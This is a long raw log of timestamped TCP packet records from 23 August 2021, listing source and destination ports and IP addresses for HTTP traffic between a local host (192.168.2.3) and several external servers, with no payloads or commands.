Aug 23, 2021 02:09:12.343826056 CEST	49856	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.344960928 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.349734068 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.349899054 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.349952936 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.349983931 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.349984884 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.350054979 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.350438118 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.350466013 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.350496054 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.350532055 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.350642920 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.350965023 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.351057053 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.351140976 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.351473093 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.351571083 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.351667881 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.351710081 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.351737976 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.369575024 CEST	80	49856	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.369653940 CEST	49856	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.370446920 CEST	80	49857	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.370533943 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.371037960 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.396122932 CEST	80	49857	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.397072077 CEST	80	49857	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.397092104 CEST	80	49857	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.397241116 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.411309958 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.411325932 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.411334991 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.411462069 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.411467075 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.411808968 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413072109 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413177967 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413256884 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413521051 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413532972 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413790941 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.413803101 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.471924067 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.471939087 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.514192104 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.515397072 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.539161921 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:12.539323092 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:12.539397001 CEST	80	49857	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.539541960 CEST	49857	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.540529013 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.542098045 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.542535067 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.570033073 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.570648909 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.570671082 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.570736885 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.570764065 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.694484949 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:12.720813036 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.720837116 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:12.721870899 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:13.238387108 CEST	80	49852	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:13.238406897 CEST	80	49852	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:13.238574982 CEST	49852	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:13.251063108 CEST	49852	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:13.269748926 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.300772905 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.300869942 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.301078081 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.332053900 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332673073 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332705975 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332730055 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332755089 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332755089 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.332777023 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332804918 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332815886 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.332829952 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332853079 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.332858086 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332880974 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332902908 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.332906008 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.332958937 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363715887 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363744974 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363769054 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363782883 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363790035 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363815069 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363836050 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363842964 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363856077 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363876104 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363889933 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363897085 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363918066 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363923073 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363945961 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363964081 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.363965988 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.363986969 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364005089 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.364007950 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364027023 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364041090 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.364048004 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364068985 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364087105 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.364094973 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364118099 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364130974 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.364137888 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.364170074 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.394937992 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.394961119 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.394979954 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395044088 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395272970 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395327091 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395359039 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395431042 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395473957 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395515919 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395561934 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395586014 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395610094 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395627022 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395646095 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395672083 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395684004 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395704031 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395721912 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395736933 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395755053 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395778894 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395787001 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395807028 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395828962 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395838022 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395857096 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395879984 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395889044 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395908117 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395931005 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395940065 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395960093 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.395978928 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.395991087 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396014929 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396035910 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396053076 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396073103 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396097898 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396111012 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396131039 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396148920 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396162987 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396182060 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396205902 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396212101 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396231890 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396254063 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396262884 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396282911 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396301985 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396313906 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396375895 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396380901 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396404982 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396425009 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396440983 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.396444082 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.396480083 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.426142931 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426187038 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426203966 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426218987 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426234961 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426265955 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.426475048 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427320957 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427364111 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427417040 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427453041 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427536964 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427588940 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427608967 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427648067 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427678108 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427695990 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427712917 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427731991 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427762032 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427763939 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427786112 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427804947 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427846909 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427854061 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427886009 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427890062 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427906990 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427922010 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427954912 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.427954912 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427975893 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.427995920 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428014040 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428015947 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428031921 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428046942 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428066969 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428075075 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428088903 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428103924 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428112030 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428132057 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428152084 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428164005 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428172112 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428188086 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428203106 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428209066 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428225994 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428240061 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428253889 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428260088 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428276062 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428294897 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428297997 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428301096 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428318024 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428332090 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428350925 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428361893 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428371906 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428390980 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428405046 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428411007 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428431988 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.428448915 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428565025 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.428570032 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.457556963 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.457632065 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.457693100 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.457706928 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.457751989 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.457811117 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.457869053 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.459589005 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459666014 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.459706068 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459757090 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459795952 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459809065 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.459831953 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459870100 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459882975 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.459907055 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459953070 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.459954023 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.459995031 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460038900 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460092068 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460127115 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460187912 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460191965 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460247993 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460287094 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460299969 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460324049 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460361958 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460371017 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460407972 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460448980 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460459948 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460485935 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460524082 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460534096 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460561991 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460597992 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460614920 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460634947 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460671902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460680962 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460717916 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460758924 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460762978 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460796118 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460833073 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460845947 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460870028 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460905075 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460921049 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.460942984 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460979939 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.460988045 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.461025953 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461066961 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461077929 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.461102009 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461139917 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461152077 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.461179018 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461215019 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461241007 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.461252928 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.461318016 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.488884926 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.488926888 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.488950014 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.488971949 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.489006996 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.489026070 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.489044905 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.489063025 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.489103079 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.492130041 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492223024 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492327929 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.492379904 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492415905 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492454052 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492506027 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492552042 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.492579937 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.492640972 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492729902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492818117 CEST	49859	80	192.168.2.3	193.142.59.123
